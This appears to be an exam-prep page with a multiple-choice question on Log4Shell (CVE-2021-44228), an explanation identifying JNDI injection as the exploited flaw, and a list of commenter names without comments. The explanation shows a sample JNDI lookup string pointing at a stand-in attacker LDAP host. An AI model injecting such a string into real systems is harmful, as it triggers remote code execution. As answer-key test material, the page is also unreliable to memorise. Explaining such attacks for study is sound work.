In the context of the infamous log4j vulnerability (CVE-2021-44228), which vulnerability is exploited in the backend to achieve Remote Code Execution?
The Log4j vulnerability, identified as CVE-2021-44228 (commonly known as Log4Shell), is a critical security flaw in the Apache Log4j library, a widely used logging framework in Java applications. This vulnerability allows remote code execution (RCE) when an attacker crafts a malicious input (e.g., ${jndi:ldap://malicious.com/a}) that is logged by a vulnerable Log4j instance. The exploit leverages JNDI (Java Naming and Directory Interface) Injection, where the JNDI lookup mechanism is abused to load remote code from an attacker-controlled server. All options (A, B, and C) list 'JNDI Injection,' which is correct, but since B is marked as the selected answer in the image, it is taken as the intended choice. This redundancy in options suggests a possible error in the question design, but the vulnerability is unequivocally JNDI Injection. Option D ('None of the above') is incorrect as JNDI Injection is the exploited vulnerability. This topic is critical in the CAP syllabus under injection attacks and RCE prevention.
Edwin
6 months agoBeckie
7 months agoErnest
7 months agoCristy
7 months agoLea
7 months agoJoni
8 months agoColby
8 months agoGregoria
8 months agoMarti
8 months agoJoye
9 months agoRory
9 months agoNoah
9 months agoXochitl
9 months agoRosita
9 months agoMichael
12 months agoRonald
12 months agoAhmed
12 months agoKami
10 months agoJennifer
11 months agoMarguerita
11 months agoCarmela
11 months agoSanda
1 year agoBettyann
1 year agoLonny
11 months agoWava
12 months agoAmie
12 months agoMarva
1 year agoMerissa
1 year agoReta
12 months agoFausto
12 months agoMing
1 year agoLouvenia
1 year ago